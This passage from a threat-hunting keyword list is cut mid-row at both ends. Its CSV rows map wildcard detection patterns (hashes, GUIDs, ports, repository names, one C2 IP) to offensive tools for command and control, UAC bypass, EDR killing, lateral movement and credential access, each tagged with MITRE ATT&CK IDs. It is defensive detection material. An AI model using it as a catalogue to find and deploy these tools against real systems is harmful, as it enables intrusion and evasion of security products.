evasion,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z
-*0.0.0.0:2222*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z
-*0.0.0.0:4444*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z
-*0.0.0.0:4445*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z
-*0.0.0.0:53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z
-*00_create_all_modules_test*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing.
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation
tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*01_all_exploits_have_payloads_test*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing
built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*0472A393-9503-491D-B6DA-FA47CD567EDE*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z
-*04845492-BD9E-4EC6-ACA4-4A0A460B3508*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*04ca7e137e1e9feead96a7df45bb67d5ab3de190*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*04FC654C-D89A-44F9-9E34-6D95CE152E9D*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,0,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*07EF7652-1C2D-478B-BB4B-F9560695A387*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - 
TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*0971A047-A45A-43F4-B7D8-16AC1114B524*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,0,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,0,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*0ac82760-3e0d-4124-bd1c-92c8dab97171*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to 
interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,0,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*0B6D8B01-861E-4CAF-B1C9-6670884381DB*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,0,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,0,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*0d1n * --post * --payloads *,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,0,N/A,N/A,,N/A,,, -*0d1n --host*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,0,N/A,N/A,,N/A,,, -*0d1n*kill_listener.sh*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*0DD419E5-D7B3-4360-874E-5838A7519355*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*0evilpwfilter*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*0evilpwfilter.dll*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*0vercl0k/udmp-parser*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,1,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*0x00-0x00*,offensive_tool_keyword,Github Username,Github pentester username with lots of different exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/0x00-0x00,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*0x09AL/DNS-Persist*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*0x09AL/IIS-Raid*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*0xbadjuju/Tokenvator*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*0xbadjuju/WheresMyImplant*,offensive_tool_keyword,WheresMyImplant,A Bring 
Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*0xdarkvortex-MalwareDevelopment*,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z -*0xdeadbeef*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,1,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*0xsp-SRD/mortar*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,1,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*0xthirteen/MoveKit*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*0xthirteen/PerfExec*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,1,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -*0xthirteen/SharpRDP*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*0xthirteen/StayKit*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*0xthirteen/StayKit*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*1_FindDomain.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync 
installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*105C2C6D-1C0A-4535-A231-80E355EFB112*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,0,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*10k-worst-pass.txt*,offensive_tool_keyword,AD exploitation cheat sheet,Crack with TGSRepCrack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*11385CC1-54B7-4968-9052-DF8BB1961F1E*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) 
- Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*119.45.104.153:8848*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*123abcbde966780cef8d9ec24523acac*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,0,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*127.0.0.1 is not advisable as a source. 
